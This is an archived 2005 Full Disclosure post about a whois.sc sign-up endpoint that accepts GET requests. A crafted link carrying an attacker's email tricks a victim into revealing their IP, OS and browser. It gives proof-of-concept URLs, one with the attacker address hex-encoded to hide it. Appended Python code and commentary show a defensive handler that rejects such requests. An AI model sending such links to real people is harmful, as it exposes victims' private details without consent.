Full Disclosure mailing list archives
whois.sc not-big-deal hole
From: unknown unknown <unknown.pentester () gmail com>
Date: Wed, 2 Nov 2005 16:53:20 +0000
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I thought it's an interesting way to get the following information about a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone into visiting your website and then checking the webserver logs. Email headers also help, not to mention loud OS detection tools such as xprobe2 and nmap (which will only work if you're lucky and the "victim" doesn't use a firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we use a sign-up service provided by an existing website for our own purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation with your email address for the first time.

The original request to sign up for an account is a POST request *similar* to the following:

POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48

action=newaccount&doneurl=&email=test%40test.com

However we can change the request from POST to GET and the application will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com

PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com

Replace "attacker%40evilmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the "victim".

Also, we could obfuscate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D

Note: "%40" is "@" in hex.

For a good resource to convert strings to different encodings check out http://www.thedumbterminal.co.uk/php/stringdecode.php

Regards,
pagvac
Earth, SOLAR SYSTEM

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
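The two weaknesses the post relies on are that a state-changing action (creating an account) is accepted over GET, so a link someone else clicks performs it, and that the parameters arrive percent-encoded (the email in hex, doneurl double-encoded), so a reviewer reading the raw request does not immediately see what was submitted. The following is an added example written from the application side, not code from whois.sc or from the post; the handler name, the csrf_token_valid flag and the decisions it takes are assumptions about how a hardened version of such an endpoint could behave. It decodes each parameter until stable so the number of encoding layers is visible, rejects the sign-up action unless it comes in as a POST with a valid token, and only allows a same-origin path in doneurl.

```python
from urllib.parse import unquote, urlsplit

# Actions that create or change server-side state and must therefore never be
# triggerable by a link (GET) that a third party clicks.
STATE_CHANGING_ACTIONS = {"newaccount"}


def decode_param(value, max_rounds=4):
    """Percent-decode until the value stops changing.

    Returns (decoded, rounds). rounds == 1 is ordinary URL encoding;
    rounds >= 2 means the value arrived double-encoded, e.g. %252F -> %2F -> /.
    max_rounds bounds the loop so a pathological input cannot spin it.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def parse_query(query):
    """Split a raw query string into {name: (decoded_value, rounds)}.

    parse_qs is deliberately not used: it decodes once and hides how many
    encoding layers the client actually sent.
    """
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        result[unquote(name)] = decode_param(raw)
    return result


def is_local_redirect(target):
    """Accept only an empty target or a same-origin absolute path."""
    if target == "":
        return True
    parts = urlsplit(target)
    return (parts.scheme == "" and parts.netloc == ""
            and target.startswith("/") and not target.startswith("//"))


def evaluate_signup(method, query, csrf_token_valid):
    """Decide whether a sign-up request may be processed.

    csrf_token_valid stands in for the session-bound token check a real
    application would perform (hypothetical; the post shows no such token).
    Returns the normalised parameters plus the reasons for rejection, which is
    what an audit log should record rather than the raw encoded string.
    """
    params = parse_query(query)
    action, _ = params.get("action", ("", 0))
    email, email_rounds = params.get("email", ("", 0))
    doneurl, doneurl_rounds = params.get("doneurl", ("", 0))

    rejections = []
    notes = []
    if action in STATE_CHANGING_ACTIONS:
        if method.upper() != "POST":
            rejections.append("state-changing action requested with " + method.upper())
        if not csrf_token_valid:
            rejections.append("missing or invalid CSRF token")
    if not is_local_redirect(doneurl):
        rejections.append("doneurl is not a local path")
    if email_rounds >= 2:
        notes.append("email was double-encoded")
    if doneurl_rounds >= 2:
        notes.append("doneurl was double-encoded")

    return {
        "accepted": not rejections,
        "action": action,
        "email": email,
        "doneurl": doneurl,
        "rejections": rejections,
        "notes": notes,
    }


if __name__ == "__main__":
    # Constructed input: the hex-encoded GET link from the post, with no token.
    link_query = ("action=newaccount&doneurl=%252Freverse-ip%252F"
                  "&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D")
    print(evaluate_signup("GET", link_query, csrf_token_valid=False))
    # Constructed input: the ordinary POST form submission.
    print(evaluate_signup("POST", "action=newaccount&doneurl=&email=test%40test.com",
                          csrf_token_valid=True))
```

Run on the post's GET link the handler rejects it twice over (wrong method, no token), records that doneurl was double-encoded, and logs the email as the readable attacker@evilmail.com rather than the hex string. The method and token checks address the "change POST to GET" step; separately, the information the post is after only leaks because the activation mail carries the requester's IP and browser details to an address nobody has verified yet, so keeping request metadata out of mail sent to unconfirmed addresses closes the disclosure itself.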